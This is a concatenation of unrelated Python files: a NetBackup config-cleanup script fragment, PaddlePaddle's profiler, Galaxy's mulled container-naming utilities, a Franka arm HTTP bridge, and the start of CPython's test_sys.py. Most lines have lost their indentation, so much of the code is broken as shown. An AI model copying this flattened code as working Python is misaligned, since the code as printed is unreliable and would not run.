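    assert split([1, 2, 3, 4, 5], 2) == [[1, 2], [3, 4], [5]]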
def del_nbu_server(host):
out = ''
with open(os.devnull, 'w') as FNULL:
try:
logging.info("Getting config from host {0}".format(host))
out = subprocess.Popen([bpgetconfig_path, "-M", host],
stdout=subprocess.PIPE, stderr=FNULL).communicate()[0].strip()
except subprocess.CalledProcessError:
logging.warn("Can't reach host {0}".format(host))
if len(out) != 0:
logging.debug("Config for host {0} was >>{2}{1}{2}<<".format(host, out, os.linesep))
host_servers = filter(lambda x: x not in servers, out.splitlines())
host_servers = [ii for n, ii in enumerate(host_servers) if ii not in host_servers[:n]] # remove duplicates
host_servers = os.linesep.join(host_servers)
logging.debug("Setting servers to >>{0}<< for host {1}".format(host, host_servers))
subprocess.Popen([bpsetconfig_path, '-h', host], stdin=subprocess.PIPE, stdout=FNULL,
stderr=FNULL).communicate(
input=host_servers)
logging.info("Config for host {0} was updated".format(host))
try:
logging.info("Verifying that host {0} reachable after update".format(host))
out = subprocess.Popen([bpgetconfig_path, "-M", host],
stdout=subprocess.PIPE, stderr=FNULL).communicate()[0].strip()
if len(out) == 0:
logging.critical("After updating config on host {0} became unreachable. Aborting...".format(host))
os._exit(1) # stop all threads
else:
logging.info("Host {0} is reachable after update. OK.".format(host))
print '{0} config was updated successfully'.format(host)
except subprocess.CalledProcessError:
logging.critical("After updating config on host {0} became unreachable. Aborting...".format(host))
os._exit(1) # stop all threads
else:
logging.warn("Can't reach host {0}".format(host))
def del_server_hosts(task_list):
for host in task_list:
del_nbu_server(host)
threads = []
if __name__ == '__main__':
part_hosts = split(hosts, int(ceil(float(len(hosts)) / options.num_threads)))
for task_list in part_hosts:
t = threading.Thread(target=del_server_hosts, args=(task_list,))
threads.append(t)
t.start()
for t in threads:
t.join()
|
profiler.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=doc-string-missing
import os
import sys
import logging
if sys.version_info.major == 2:
import Queue
elif sys.version_info.major == 3:
import queue as Queue
else:
raise Exception("Error Python version")
from time import time as _time
import time
import threading
import multiprocessing
_LOGGER = logging.getLogger(__name__)
_LOGGER.propagate = False
class PerformanceTracer(object):
def __init__(self, is_thread_mode, interval_s, server_worker_num):
self._is_thread_mode = is_thread_mode
if is_thread_mode:
            # Because a Channel created in thread mode cannot be
            # accessed across processes, the PerformanceTracer also
            # runs in thread mode when thread mode is used.
            # However, performance may be affected by the GIL.
self._data_buffer = Queue.Queue()
else:
self._data_buffer = multiprocessing.Manager().Queue()
self._interval_s = interval_s
self._thrd = None
self._proc = None
self._channels = []
# The size of data in Channel will not exceed server_worker_num
self._server_worker_num = server_worker_num
def data_buffer(self):
return self._data_buffer
def start(self):
if self._is_thread_mode:
self._thrd = threading.Thread(
target=self._trace_func, args=(self._channels, ))
self._thrd.daemon = True
self._thrd.start()
else:
self._proc = multiprocessing.Process(
target=self._trace_func, args=(self._channels, ))
self._proc.daemon = True
self._proc.start()
def set_channels(self, channels):
self._channels = channels
def _trace_func(self, channels):
all_actions = ["in", "prep", "midp", "postp", "out"]
calcu_actions = ["prep", "midp", "postp"]
while True:
op_cost = {}
err_request = []
err_count = 0
_LOGGER.info("==================== TRACER ======================")
# op
while True:
try:
item = self._data_buffer.get_nowait()
name = item["name"]
actions = item["actions"]
if name == "DAG":
succ = item["succ"]
req_id = item["id"]
if not succ:
err_count += 1
err_request.append(req_id)
if name not in op_cost:
op_cost[name] = {}
for action, cost in actions.items():
if action not in op_cost[name]:
op_cost[name][action] = []
op_cost[name][action].append(cost)
except Queue.Empty:
break
if len(op_cost) != 0:
for name in op_cost:
tot_cost, calcu_cost = 0.0, 0.0
for action, costs in op_cost[name].items():
op_cost[name][action] = sum(costs) / (1e3 * len(costs))
tot_cost += op_cost[name][action]
if name != "DAG":
_LOGGER.info("Op({}):".format(name))
for action in all_actions:
if action in op_cost[name]:
_LOGGER.info("\t{}[{} ms]".format(
action, op_cost[name][action]))
for action in calcu_actions:
if action in op_cost[name]:
calcu_cost += op_cost[name][action]
_LOGGER.info("\tidle[{}]".format(1 - 1.0 * calcu_cost /
tot_cost))
if "DAG" in op_cost:
calls = list(op_cost["DAG"].values())
calls.sort()
tot = len(calls)
qps = 1.0 * tot / self._interval_s
ave_cost = sum(calls) / tot
latencys = [50, 60, 70, 80, 90, 95, 99]
_LOGGER.info("DAGExecutor:")
_LOGGER.info("\tQuery count[{}]".format(tot))
_LOGGER.info("\tQPS[{} q/s]".format(qps))
_LOGGER.info("\tSucc[{}]".format(1 - 1.0 * err_count / tot))
_LOGGER.info("\tError req[{}]".format(", ".join(
[str(x) for x in err_request])))
_LOGGER.info("\tLatency:")
_LOGGER.info("\t\tave[{} ms]".format(ave_cost))
for latency in latencys:
_LOGGER.info("\t\t.{}[{} ms]".format(latency, calls[int(
tot * latency / 100.0)]))
# channel
_LOGGER.info("Channel (server worker num[{}]):".format(
self._server_worker_num))
for channel in channels:
_LOGGER.info("\t{}(In: {}, Out: {}) size[{}/{}]".format(
channel.name,
channel.get_producers(),
channel.get_consumers(),
channel.size(), channel.get_maxsize()))
time.sleep(self._interval_s)
class UnsafeTimeProfiler(object):
""" thread unsafe profiler """
def __init__(self):
self.pid = os.getpid()
self.print_head = 'PROFILE\tpid:{}\t'.format(self.pid)
self.time_record = [self.print_head]
self._enable = False
def enable(self, enable):
self._enable = enable
def record(self, name):
if self._enable is False:
return
timestamp = int(round(_time() * 1000000))
self.time_record.append('{}:{} '.format(name, timestamp))
return timestamp
def print_profile(self):
if self._enable is False:
return
sys.stderr.write(self.gen_profile_str())
def gen_profile_str(self):
if self._enable is False:
return
self.time_record.append('\n')
profile_str = ''.join(self.time_record)
self.time_record = [self.print_head]
return profile_str
class TimeProfiler(object):
def __init__(self):
self._pid = os.getpid()
self._print_head = 'PROFILE\tpid:{}\t'.format(self._pid)
self._time_record = Queue.Queue()
self._enable = False
self._lock = threading.Lock()
def enable(self, enable):
self._enable = enable
def record(self, name_with_tag):
if self._enable is False:
return
timestamp = int(round(_time() * 1000000))
name_with_tag = name_with_tag.split("_")
tag = name_with_tag[-1]
name = '_'.join(name_with_tag[:-1])
with self._lock:
self._time_record.put((name, tag, timestamp))
return timestamp
def print_profile(self):
if self._enable is False:
return
sys.stderr.write(self.gen_profile_str())
def gen_profile_str(self):
if self._enable is False:
return
print_str = self._print_head
tmp = {}
with self._lock:
while not self._time_record.empty():
name, tag, timestamp = self._time_record.get()
if name in tmp:
ptag, ptimestamp = tmp.pop(name)
print_str += "{}_{}:{} ".format(name, ptag, ptimestamp)
print_str += "{}_{}:{} ".format(name, tag, timestamp)
else:
tmp[name] = (tag, timestamp)
print_str = "\n{}\n".format(print_str)
for name, item in tmp.items():
tag, timestamp = item
self._time_record.put((name, tag, timestamp))
return print_str
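# A minimal usage sketch of TimeProfiler (assumptions: record names carry a
# trailing _0/_1 tag so gen_profile_str can pair begin/end timestamps; the
# "infer" span name is illustrative only).
if __name__ == "__main__":
    _profiler = TimeProfiler()
    _profiler.enable(True)
    _profiler.record("infer_0")  # begin timestamp of the "infer" span
    time.sleep(0.01)             # stand-in for real work
    _profiler.record("infer_1")  # end timestamp of the "infer" span
    _profiler.print_profile()    # writes "PROFILE\tpid:<pid>\tinfer_0:<us> infer_1:<us>" to stderr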
|
util.py
|
"""Utilities for working with mulled abstractions outside the mulled package."""
from __future__ import print_function
import collections
import hashlib
import logging
import re
import sys
import tarfile
import threading
from io import BytesIO
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
BUILD_NUMBER_REGEX = re.compile(r'\d+$')
PARSED_TAG = collections.namedtuple('ParsedTag', 'tag version build_string build_number')
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
requests.post("https://quay.io/api/v1/repository", json=data, headers=headers)
def quay_versions(namespace, pkg_name):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'].keys() if tag != 'latest']
def quay_repository(namespace, pkg_name):
assert namespace is not None
assert pkg_name is not None
url = 'https://quay.io/api/v1/repository/%s/%s' % (namespace, pkg_name)
response = requests.get(url, timeout=None)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
    Check whether the given quay.io namespace contains a repository with the supplied name.
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=None)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
        # The following check is pretty expensive against biocontainers... don't even bother
        # doing it if we can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.debug("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
def split_tag(tag):
"""Split mulled image tag into conda version and conda build."""
return tag.rsplit('--', 1)
def parse_tag(tag):
"""Decompose tag of mulled images into version, build string and build number."""
version = tag
build_string = "-1"
if '--' in tag:
version, build_string = tag.rsplit('--', 1)
elif '-' in tag:
# Should be mulled multi-container image tag
version, build_string = tag.rsplit('-', 1)
build_number = int(BUILD_NUMBER_REGEX.search(tag).group(0))
return PARSED_TAG(tag=tag,
version=packaging.version.parse(version),
build_string=packaging.version.parse(build_string),
build_number=build_number)
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
elements = (parse_tag(tag) for tag in elements)
elements = sorted(elements, key=lambda tag: tag.build_string, reverse=True)
elements = sorted(elements, key=lambda tag: tag.build_number, reverse=True)
elements = sorted(elements, key=lambda tag: tag.version)
return [e.tag for e in elements]
Target = collections.namedtuple("Target", ["package_name", "version", "build", "package"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
return Target(package_name, version, build, package_name)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
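# Illustrative check of the helpers above: build_target plus
# conda_build_target_str produce a conda-style "name=version=build" spec.
def _conda_build_target_str_example():
    target = build_target("samtools", version="1.3.1", build="py_1")
    assert conda_build_target_str(target) == "samtools=1.3.1=py_1"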
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
build = target.build
if build is None and image_build is not None and image_build != "0":
# Special case image_build == "0", which has been built without a suffix
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
build = image_build
suffix += ":%s" % target.version
if build is not None:
suffix += "--%s" % build
return "%s%s" % (target.package_name, suffix)
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return "mulled-v1-%s%s" % (m.hexdigest(), suffix)
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1--py_1'
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1--py_1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
            # tagged version is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = ":%s%s" % (version_hash_str, build_suffix)
return "mulled-v2-%s%s" % (package_hash.hexdigest(), suffix)
def get_file_from_recipe_url(url):
"""Downloads file at url and returns tarball"""
r = requests.get(url)
return tarfile.open(mode="r:bz2", fileobj=BytesIO(r.content))
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress(object):
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = threading.Event()
def progress(self):
while not self.stop.is_set():
print(".", end="")
sys.stdout.flush()
self.stop.wait(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop.set()
self.thread.join()
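def _print_progress_example():
    """Minimal usage sketch (illustrative only): wrap a slow operation so a
    dot is printed every 60 seconds until the with-block exits."""
    import time
    with PrintProgress():
        time.sleep(0.1)  # stand-in for a long-running container build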
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
|
arm_interface_helper.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, SRI International
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of SRI International nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Acorn Pooley, Mike Lautman
"""This is a python2 heper script to use `moveit_commander`.
`moveit_commander` is not usable with python3. To prevent me from compiling a
catkin worspace with python3 and potentially breaking compatibility with other
components, I created this script that allows bridging the python3 script with
the python2 script."""
import json
import threading
import geometry_msgs.msg
import moveit_commander
import moveit_msgs.msg
import rospy
from bottle import post, request, run
class FrankaInterface(object):
"""Franka Interface."""
def __init__(self):
super(FrankaInterface, self).__init__()
moveit_commander.roscpp_initialize([""])
self.robot = moveit_commander.RobotCommander()
self.scene = moveit_commander.PlanningSceneInterface()
self.group_name = "panda_arm"
self.move_group = moveit_commander.MoveGroupCommander(self.group_name)
self.display_trajectory_publisher = rospy.Publisher(
"/move_group/display_planned_path", moveit_msgs.msg.DisplayTrajectory, queue_size=20
)
self.planning_frame = self.move_group.get_planning_frame()
self.eef_link = self.move_group.get_end_effector_link()
self.group_names = self.robot.get_group_names()
def move_joints(self, goal):
"""Move joint."""
joint_goal = self.move_group.get_current_joint_values()
joint_goal[:7] = goal
self.move_group.go(joint_goal, wait=True)
self.move_group.stop() # ensures that there is no residual movement
def move_ee(self, goal):
"""Move cartesian."""
pose_goal = geometry_msgs.msg.Pose()
pose_goal.position.x = goal[0]
pose_goal.position.y = goal[1]
pose_goal.position.z = goal[2]
pose_goal.orientation.x = goal[3]
pose_goal.orientation.y = goal[4]
pose_goal.orientation.z = goal[5]
pose_goal.orientation.w = goal[6]
self.move_group.set_pose_target(pose_goal)
self.move_group.go(wait=True)
self.move_group.stop() # ensures that there is no residual movement
self.move_group.clear_pose_targets()
def get_current_joint_values(self):
joint_values = self.move_group.get_current_joint_values()
return joint_values[:7]
def get_current_pose(self, end_effector_link="panda_link8"):
"""Get current pose"""
pose = self.move_group.get_current_pose(end_effector_link).pose
return (
(pose.position.x, pose.position.y, pose.position.z),
(pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w),
)
def get_current_rpy(self, end_effector_link="panda_link8"):
"""Get current rool, pitch, yaw."""
return self.move_group.get_current_rpy(end_effector_link)
def display_trajectory(self, plan):
"""Display trajectory."""
display_trajectory = moveit_msgs.msg.DisplayTrajectory()
display_trajectory.trajectory_start = self.robot.get_current_state()
display_trajectory.trajectory.append(plan)
self.display_trajectory_publisher.publish(display_trajectory)
@post("/process")
def my_process():
req_obj = json.loads(request.body.read())
req_type = req_obj["type"]
out = None
if req_type == "ready":
pass
elif req_type == "call":
func = getattr(fi, req_obj["func_name"])
if req_obj["wait_for_result"]:
out = func(*req_obj["args"], **req_obj["kwargs"])
return {"out": out}
else:
t = threading.Thread(target=func, args=req_obj["args"], kwargs=req_obj["kwargs"])
t.start()
else:
raise RuntimeError("unknown req_type %s" % req_type)
return {"out": None}
if __name__ == "__main__":
rospy.init_node("arm_interface_helper", anonymous=True, disable_signals=True)
fi = FrankaInterface()
run(host="localhost", port=8080, debug=True, quiet=True)
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
